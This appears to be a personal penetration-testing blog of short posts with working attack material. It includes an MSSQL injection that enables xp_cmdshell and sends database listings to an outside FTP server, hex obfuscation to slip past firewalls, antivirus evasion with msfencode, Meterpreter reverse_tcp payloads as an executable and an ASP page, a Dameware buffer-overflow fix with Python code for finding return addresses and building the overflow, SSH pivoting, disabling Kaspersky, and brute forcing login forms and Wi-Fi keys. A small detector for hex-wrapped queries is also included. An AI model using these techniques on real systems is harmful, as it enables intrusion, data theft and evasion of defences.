Showing posts with label Security. Show all posts

Wednesday, March 2, 2011

SQL Injection to Compromise OS

An MSSQL injection example that uses xp_cmdshell to talk to an FTP server. The following POC can be extended to download, upload and execute Metasploit payloads for backdoors and reverse TCP connections. I discovered this with a customer who had been directly compromised by this very attack vector:

Requirements: the injected query must run as sysadmin (or equivalent), since sp_configure and xp_cmdshell need it; the SQL Server service must run as SYSTEM (or an equivalently privileged account) for the resulting OS commands to be worth anything; and the xp_* extended procedures must not have been ripped out.

Here is the query in its entirety:

Note: Replace ftp.microsoft.com with your FTP server, and user and password with your username and password. The FTP script is written to temp\ftpcommand.txt and the same name is passed to ftp -s:, otherwise the upload silently never happens.
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; exec master..xp_cmdshell 'mkdir temp& (echo open ftp.microsoft.com& echo user& echo password& echo binary& echo lcd temp& echo put file.txt file.txt& echo bye)>temp\ftpcommand.txt & (bcp "select name,dbid,crdate from master.dbo.sysdatabases" queryout b.txt -c -T & type b.txt& del b.txt) > temp\file.txt 2>&1 & ftp -s:temp\ftpcommand.txt & rmdir /S /Q temp';--

Break down:

Step 1: Enable xp_cmdshell, which has been disabled by default since SQL Server 2005:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Step 2: Create a temporary directory (relative to the working directory of the SQL Server process, since that is what xp_cmdshell runs cmd.exe as):
exec master..xp_cmdshell 'mkdir temp&

Step 3: Write the preset FTP command script that ftp -s: will execute in the next step (open, login, binary mode, change to temp, upload file.txt, quit):
(echo open ftp.microsoft.com& echo user& echo password& echo binary& echo lcd temp& echo put file.txt file.txt& echo bye)>temp\ftpcommand.txt &

Step 4: Use bcp to dump the list of databases into temp\file.txt, upload it to your server with the FTP script from Step 3, then clean up:
(bcp "select name,dbid,crdate from master.dbo.sysdatabases" queryout b.txt -c -T & type b.txt& del b.txt) > temp\file.txt 2>&1 & ftp -s:temp\ftpcommand.txt & rmdir /S /Q temp';--

Recap:
This command creates a temporary directory "temp", writes a preset FTP script that uploads file.txt, runs a bcp query that dumps the database list into that file, uploads the file to the FTP server with ftp -s:temp\ftpcommand.txt (the preset script), and finally cleans up with rmdir.

You can obviously expand this to upload/download backdoors to initiate reverse_tcp connections.

Additionally, some trivial obfuscation: hex-encode the query, store it in a variable, then pass that variable to exec() to bypass primitive application firewalls that key off basic search strings such as xp_cmdshell:

declare @q varchar(8000) select @q = 0x[hex_encoded_query] exec(@q)
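As an added example (not code from the original post), the following Python builds the hex-wrapped form of the staged query described above, and then does the defender's job: peel the 0x... wrapper off a logged query and flag the xp_cmdshell / sp_configure primitives hidden inside. The function names, the ftp.example.com host and the credentials in STAGED_QUERY are placeholders of mine, not anything from the post.

```python
# Added example, not part of the original post: build the hex-wrapped T-SQL
# described above, then reverse it on the defender side.
# ftp.example.com, user and password are placeholders.
import re

# The staged xp_cmdshell query from the post, with the ftp script name kept
# consistent (ftpcommand.txt is both written and passed to ftp -s:).
STAGED_QUERY = (
    "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;"
    "EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; "
    "exec master..xp_cmdshell 'mkdir temp& (echo open ftp.example.com& "
    "echo user& echo password& echo binary& echo lcd temp& "
    "echo put file.txt file.txt& echo bye)>temp\\ftpcommand.txt & "
    "(bcp \"select name,dbid,crdate from master.dbo.sysdatabases\" "
    "queryout b.txt -c -T & type b.txt& del b.txt) > temp\\file.txt 2>&1 & "
    "ftp -s:temp\\ftpcommand.txt & rmdir /S /Q temp';--"
)


def hex_wrap(tsql: str) -> str:
    """Hex-encode a T-SQL string the way the post's obfuscation does.

    SQL Server implicitly converts a varbinary literal (0x...) assigned to a
    varchar variable back into the original characters, so exec(@q) runs the
    decoded text while the bytes on the wire never contain 'xp_cmdshell'.
    latin-1 keeps one byte per character, matching varchar (not nvarchar).
    """
    hexed = tsql.encode("latin-1").hex()
    return f"declare @q varchar(8000) select @q = 0x{hexed} exec(@q)"


# Detection side, e.g. over SQL Server trace/audit text or a WAF log.
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)")
SUSPICIOUS = ("xp_cmdshell", "sp_configure", "show advanced options",
              "bcp ", "ftp -s:")


def unhex_literals(query: str) -> str:
    """Replace every even-length 0x.. literal with its decoded text.

    Repeats until nothing changes so a wrapper nested inside another wrapper
    is peeled too; every pass halves the literal it decodes, so it terminates.
    """
    def decode(match):
        digits = match.group(1)
        if len(digits) % 2:          # odd length cannot be a byte string
            return match.group(0)
        return bytes.fromhex(digits).decode("latin-1")

    previous, current = None, query
    while previous != current:
        previous, current = current, HEX_LITERAL.sub(decode, current)
    return current


def flag_query(query: str) -> list:
    """Return the suspicious primitives present once the query is de-obfuscated."""
    decoded = unhex_literals(query).lower()
    return [needle for needle in SUSPICIOUS if needle in decoded]


if __name__ == "__main__":
    wrapped = hex_wrap(STAGED_QUERY)
    print(wrapped[:80] + "...")
    print("raw string match on the wire:", "xp_cmdshell" in wrapped.lower())
    print("primitives after decoding   :", flag_query(wrapped))
```

A WAF that only searches the request body for xp_cmdshell misses the wrapped form entirely; a detector that decodes 0x literals before matching catches it, nested wrappers included. The real fix is on the server: leave xp_cmdshell disabled and do not let the application's login hold sysadmin.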

Monday, June 21, 2010

Bypassing AV with msfencode

Example of encoding with shikata, 10 iterations.

./msfpayload windows/meterpreter/reverse_tcp LHOST=[local_ip] LPORT=8888 r | msfencode -t exe -e x86/shikata_ga_nai -c 10 -o novacoast_encoded.exe

Wednesday, June 2, 2010

Scanning through Meterpreter and SSH Tunnel

By Mark Baggett


The Players
Attacker 172.16.186.132
Victim 172.16.186.126

Step 1 - After you have meterpreter access install OpenSSH on the victim's computer. Joff Thyer, packet guru, crazy aussie and all around smart guy did a great job of outlining the install process on his blog. I pretty much just followed his instructions here.

Step 2 - After you've installed OpenSSH and set up your account, use Meterpreter's PORTFWD command to forward a port from the attacker's machine to the SSH listener on the victim's machine. For example:

meterpreter> portfwd add -L 172.16.186.132 -l 8000 -r 172.16.186.128 -p 22

(Notes to self: alternatively without Meterpreter: ssh -L 8000:localhost:22 username@victim)

This command sets up a listener on port 8000 of the attacker's IP (172.16.186.132) and forwards packets to port 22 on the victim's machine (172.16.186.128).


Step 3 - SSH into the portfwd port you just created and setup a dynamic port forwarder on your machine. For example:

# ssh -D 127.0.0.1:9000 -p 8000 username@172.16.186.132

(My own notes: ssh -D 127.0.0.1:9000 -p 8000 username@attackermachine)

This command sets up a SOCKS4 proxy on port 9000 which is forwarded through the SSH session on the victim.

Step 4 - Use PROXYCHAINS to forward your nessusd traffic through the SOCKS4 listener on port 9000. This is as simple as changing the TCP port on the last line of /etc/proxychains.conf from its default of 9050 to port 9000 and launching nessusd through proxychains as follows:

# proxychains /usr/sbin/nessusd -D

Step 5 - Start the nessus client and do your scan.

Wednesday, May 26, 2010

Dameware Mini Remote Control Client Agent Exploit Windows XP SP3

/Start update 3/2/2011

After updating to the latest SP3 hotfixes and patches, the address of "jmp esp" in kernel32.dll has changed again.

At the time of this post, the new memory is:
0x7C874413

/End update


An oldie, but during a pentest the client had an old version of Dameware running on Windows XP SP3, which the exploit code referenced above does not support.

In the following lines the code defines the static addresses where it expects to find a "jmp esp" instruction:

target_os[] = ...

"WIN XP" ,{{ 0x71ab7bfb,"kernel32.dll" },{ 0x71ab7bfb,"ws2_32.dll" },{ 0x7C941EED,"ws2_32.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" },{ 0x00000000,"unknown.dll" }}},

...

We can see that item 3 (counting from 0) is set to 0x00000000 and unknown.dll. This placeholder is for XP SP3.

Using Immunity Debugger and sifting through the modules loaded by Dameware, I found that a usable jmp esp lives in kernel32.dll.

Thus, replace item 3 with { 0x7C86467B, "kernel32.dll" } to make the script support Windows XP SP3. As the update at the top shows, this address changes whenever kernel32.dll is patched, so read it from the target's actual build of the DLL rather than trusting a published value.

Like most buffer overflow exploits, you get one shot before the service is nuked. Double check and test the exploit before carrying it out.
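The search the post does by hand in Immunity Debugger, as an added example that is not part of the original post or the Dameware exploit: scan a module image for jmp esp (and its call esp / push esp; ret equivalents), reject addresses whose little-endian bytes would break a string-based overflow, and lay the overflow out around the chosen address. The module bytes are constructed here; the image base and the bad-byte set (NUL, CR, LF) are my assumptions, and the Dameware exploit's real offset to EIP is not on the page, so the 260 below is illustrative only.

```python
# Added example, not from the original post or exploit: locate return-address
# candidates in a module image and build an overflow string around one.
# SAMPLE_IMAGE is constructed; BAD_BYTES is an assumption typical of
# string-based overflows (a NUL or newline would truncate the input).
import struct

GADGETS = {
    "jmp esp": b"\xff\xe4",
    "call esp": b"\xff\xd4",
    "push esp; ret": b"\x54\xc3",
}
BAD_BYTES = {0x00, 0x0A, 0x0D}


def find_gadgets(image: bytes, image_base: int) -> list:
    """Return (virtual_address, mnemonic) for every gadget byte sequence in image.

    image is the module as mapped in memory (e.g. dumped from the debugger),
    image_base the address it is loaded at. Matches need no alignment:
    x86 happily executes from any byte offset.
    """
    hits = []
    for name, pattern in GADGETS.items():
        offset = image.find(pattern)
        while offset != -1:
            hits.append((image_base + offset, name))
            offset = image.find(pattern, offset + 1)
    return sorted(hits)


def usable(address: int) -> bool:
    """True if the little-endian encoding of address contains no bad byte."""
    return not (set(struct.pack("<I", address)) & BAD_BYTES)


def pick_return_address(image: bytes, image_base: int):
    """First usable gadget as (address, mnemonic), or None if there is none."""
    for address, name in find_gadgets(image, image_base):
        if usable(address):
            return address, name
    return None


def build_overflow(offset_to_eip: int, return_address: int,
                   shellcode: bytes, nop_sled: int = 16) -> bytes:
    """Classic layout: padding, saved-EIP overwrite, NOP sled, shellcode.

    When the overwritten return address runs jmp esp, ESP already points just
    past the return address, i.e. at the sled, which slides into the shellcode.
    """
    return (b"A" * offset_to_eip
            + struct.pack("<I", return_address)
            + b"\x90" * nop_sled
            + shellcode)


# Constructed module: 8 KiB of int3 with three gadgets planted in it.
IMAGE_BASE = 0x7C800000            # kernel32.dll's usual XP base, for illustration
_image = bytearray(b"\xcc" * 0x2000)
_image[0x0010:0x0012] = b"\xff\xe4"   # 0x7C800010: address contains a NUL byte
_image[0x1234:0x1236] = b"\xff\xe4"   # 0x7C801234: clean
_image[0x1500:0x1502] = b"\x54\xc3"   # 0x7C801500: push esp; ret
SAMPLE_IMAGE = bytes(_image)

if __name__ == "__main__":
    for address, name in find_gadgets(SAMPLE_IMAGE, IMAGE_BASE):
        print(f"0x{address:08X}  {name:14s} usable={usable(address)}")
    print("chosen:", pick_return_address(SAMPLE_IMAGE, IMAGE_BASE))
    # Both addresses quoted in the post encode without bad bytes:
    print("0x7C86467B usable:", usable(0x7C86467B), " 0x7C874413 usable:", usable(0x7C874413))
```

Run it against a dump of the target's own kernel32.dll (at the base the debugger reports) rather than a copy from another build; the post's update is exactly the case where a hotfix moved the gadget.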



Tuesday, May 25, 2010

Tabnabbing

New type of phishing. This is ingenious:

http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/

BRO IDS

From UC Berkeley, IDS:
http://www.bro-ids.org/

Sunday, May 16, 2010

Port sweep

Quick and dirty portsweep script:

#!/bin/sh

if [ -z "$1" ] || [ -z "$2" ]
then
    echo "./port_scan.sh [hostlist_file] [port]"
else

    # one /24 sweep per host listed in the file; -P0 (spelled -Pn on newer nmap) skips host discovery
    for host in $(cat "$1")
    do
        echo "scanning $host"
        nmap -oG "$host-$2.out" -v "$host/24" -p"$2" -P0
    done

    # greppable output reads "Host: <ip> () Ports: <port>/open/..."; field 2 is the IP
    grep open ./*"$2".out | cut -d" " -f2 > "$2.lst"
fi

*.lst contains a list of IPs only. Note that grep open also matches the open|filtered state, so verify hits before trusting the list.
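Parsing the greppable output properly instead of grep/cut, as an added example that is not part of the original post: the parser below reads nmap -oG lines into a per-host port/state map and selects only hosts where the port is exactly open, which the one-liner above cannot distinguish from open|filtered. The scan output is constructed, not captured from a real sweep.

```python
# Added example, not part of the original post: parse nmap -oG output and
# select hosts whose port state is exactly "open". SAMPLE_OUTPUT is constructed.
import ipaddress
import re

HOST_LINE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)\s*(.*)$")


def parse_greppable(text: str) -> dict:
    """Map each IP to its hostname and a {port: state} dictionary.

    -oG separates the fields of a Host: line with tabs; the Ports: field holds
    comma-separated port/state/protocol/owner/service/rpc/version records.
    Comment lines (# Nmap ...) and Status: lines carry no ports.
    """
    hosts = {}
    for line in text.splitlines():
        match = HOST_LINE.match(line)
        if not match:
            continue
        ip, hostname, fields = match.groups()
        entry = hosts.setdefault(ip, {"hostname": hostname or None, "ports": {}})
        for field in fields.split("\t"):
            if not field.startswith("Ports:"):
                continue
            for record in field[len("Ports:"):].split(","):
                parts = record.strip().split("/")
                if len(parts) >= 3 and parts[0].isdigit():
                    entry["ports"][int(parts[0])] = parts[1]
    return hosts


def hosts_with_open_port(hosts: dict, port: int) -> list:
    """IPs where the state is exactly 'open' (not open|filtered), sorted numerically."""
    return sorted((ip for ip, entry in hosts.items()
                   if entry["ports"].get(port) == "open"),
                  key=ipaddress.ip_address)


def naive_grep_open(text: str) -> list:
    """What `grep open | cut -d' ' -f2` yields: any Host: line containing 'open'."""
    return [line.split(" ")[1] for line in text.splitlines()
            if line.startswith("Host:") and "open" in line]


SAMPLE_OUTPUT = (
    "# Nmap 5.21 scan initiated as: nmap -oG 192.168.1.1-445.out -v 192.168.1.1/24 -p445 -P0\n"
    "Host: 192.168.1.10 ()\tStatus: Up\n"
    "Host: 192.168.1.10 ()\tPorts: 445/open/tcp//microsoft-ds///\tIgnored State: closed (0)\n"
    "Host: 192.168.1.11 ()\tPorts: 445/open|filtered/tcp//microsoft-ds///\n"
    "Host: 192.168.1.9 (fileserver)\tPorts: 445/open/tcp//microsoft-ds///\n"
    "Host: 192.168.1.12 ()\tPorts: 445/closed/tcp//microsoft-ds///\n"
    "# Nmap done at ... -- 256 IP addresses (4 hosts up) scanned in 12.34 seconds\n"
)

if __name__ == "__main__":
    hosts = parse_greppable(SAMPLE_OUTPUT)
    print("grep/cut   :", naive_grep_open(SAMPLE_OUTPUT))
    print("parsed open:", hosts_with_open_port(hosts, 445))
```

Feed it the concatenation of the *.out files the script writes; the difference between the two lists is exactly the open|filtered hosts the one-liner would have handed to your exploit.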

Friday, May 7, 2010

Cross-Compiling on BT4

#cd /root/.wine/drive_c/MinGW/bin
#wine gcc.exe [file].c -o [output]

Often the code will use Winsock (for initiating shells over TCP); in this case link against ws2_32 with the -lws2_32 flag:
-lws2_32

#wine gcc.exe [file].c -o [output] -lws2_32

Monday, May 3, 2010

Converting and Merging capture (.cap) files

Convert:
ivstools --convert [cap_file] [converted_file_name]
ivstools --convert [airportSniff2NfxpB.cap] [sniff.ivs]

Merging:
ivstools --merge [ivs_file1] [ivs_file2] ... [merged_output_file_name]
ivstools --merge sniff1.ivs sniff2.ivs sniff_out.ivs

Saturday, May 1, 2010

Piping JTR to Aircrack

./john -incremental=All --stdout | aircrack-ng -e [ssid] -w - [capture_file]

Ex:

/pentest/passwords/jtr/john -incremental=All --stdout | aircrack-ng -e linksys4800 -w - airportSniffT7T3Rh.cap

Thursday, April 29, 2010

Use OS X Airport for wireless sniffing

Scan for networks:
/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport en1 scan

Sniff:
sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport sniff

Create a symbolic link to the binary so you can easily execute it from your path if you wish.

Resultant sniff will dump the *.cap file in /tmp. Use aircrack-ng to crack the cap file now once you've captured enough IVs and/or handshake.

Monday, April 26, 2010

Disabling Kaspersky via CatchMe.exe

Kaspersky Anti-Virus is a pain in that Meterpreter cannot disable it with the "killav" script. Administrative privileges still do not give you enough permissions because the anti-virus hooks itself into the kernel.


The following is destructive, read more about CatchMe before issuing the commands:

catchme.exe -K "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -E "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -O "c:\Program Files\Kaspersky\avp.exe" [file]
reboot

or

attempt to remove catchme.exe from memory with: Darkspy, Seem, Icesword GUI

Above information found here in a nice Meterpreter cheatsheet:

Sunday, April 25, 2010

Samba 2.2.x Exploit

A nice oldie that worked for me:
http://www.milw0rm.com/exploits/7

From Nessus:
Samba <>

An attacker needs to be able to access at least one share to exploit
this flaw.

In addition, it is reported that Samba contains a flaw
related to the handling of .reg files that may allow
a local user to overwrite arbitrary files.


Usage:
./samba_2.2.8_bufferoverflow.pl -t linx86 -H [local_ip] -h [victim_ip]

Friday, April 23, 2010

THC-Hydra HTTP-POST-FORM bug

On BackTrack 4 Final there is a bug in Hydra that prevents you from brute forcing HTTP-POST/GET forms. See the following description:

To solve:

Download source:

Get patch:

Apply patch:
$ cd [path_to_hydra_src]
$ patch -p1 < [patch_file]

$./configure
$ make
$ sudo make install

You may receive a libssh error like I did. This was a bug in the pre-final release of BackTrack. To apply the libssh patch, download:


Patch again:
$ cd [path_to_hydra_src]
$ patch -p1 < [patch_file]

$./configure
$ make
$ sudo make install


Example command:
hydra -t2 -e ns -L ~/projects/offsec/users.txt -P ~/projects/offsec/passwords.txt -f 192.168.11.223 http-post-form "/flatfilelogin/login.php:username=^USER^&password=^PASS^&submit=Login:Incorrect" -V

Where /flatfilelogin/login.php is the form's POST action,
username is the name of the username input field,
password is the name of the password input field, and
Incorrect is the string the page displays on a failed login. Note: check that this string really comes back in the response to a bad login, otherwise Hydra will report every attempt as successful.
Note to self: If you are receiving false positives, check for other hidden POST form fields that should also be included in the form string.

Thursday, April 22, 2010

SSH Tunneling

Using a machine as a pivot/proxy, we need to reach a service on a remote machine that is not routable from our box. The following example tunnels port 445.

My IP: 192.168.10.88
Machine 1: 192.168.11.72 //We have shell access on this machine. It has a route to Machine 2
Machine 2: 10.2.2.50 //Unroutable from my local machine

On Machine 1, SSH back to my machine with a remote forward, so that TCP port 445 on my machine is mapped to TCP port 445 on Machine 2:
$ ssh -l [my_username] -R [my_port]:[machine2_ip]:[machine2_port] [my_ip]
$ ssh -l liuser -R 445:10.2.2.50:445 192.168.10.88

Confirm with netstat -nat on my machine that the port is listening. Two caveats: sshd binds a -R listener to loopback only unless GatewayPorts is enabled, so point tools at 127.0.0.1:445; and binding a port below 1024 needs a root login on my machine (and 445 must not already be held by a local Samba).

Commonly used for exploiting unroutable services.

SNMP Set Example command

The following command sets the sysContact.0 attribute to Novacoast. It needs the write community, here the default "private":

$snmpset -v2c -c private [target_machine] SNMPv2-MIB::sysContact.0 s Novacoast
SNMPv2-MIB::sysContact.0 = STRING: Novacoast

Re-query to check the set was successful:

$ snmpwalk -v2c -c private [target_machine] | grep sysContact
SNMPv2-MIB::sysContact.0 = STRING: Novacoast

Metasploit Meterpreter Evil ASP

ASP (msfencode writes raw shellcode unless told the output format, so -t asp is required):
./msfpayload windows/meterpreter/reverse_tcp LHOST=[local_ip] LPORT=[local_port] R | msfencode -t asp -o evil_liuser.asp

$msfconsole
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST [localhost_ip]
msf > set LPORT [local_port]
msf > exploit

Upload evil_liuser.asp to the target's web server and request it in a browser; the page runs the payload, which connects back to the handler.

Metasploit Meterpreter Windows Executable Payload

Creating the payload executable:

./msfpayload windows/meterpreter/reverse_tcp LHOST=[localhost_ip] LPORT=[local_port] X > metyay.exe

$msfconsole
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST [localhost_ip]
msf > set LPORT [local_port]
msf > exploit

Run metyay.exe on the victim machine; the handler's LHOST and LPORT must match the values baked into the payload.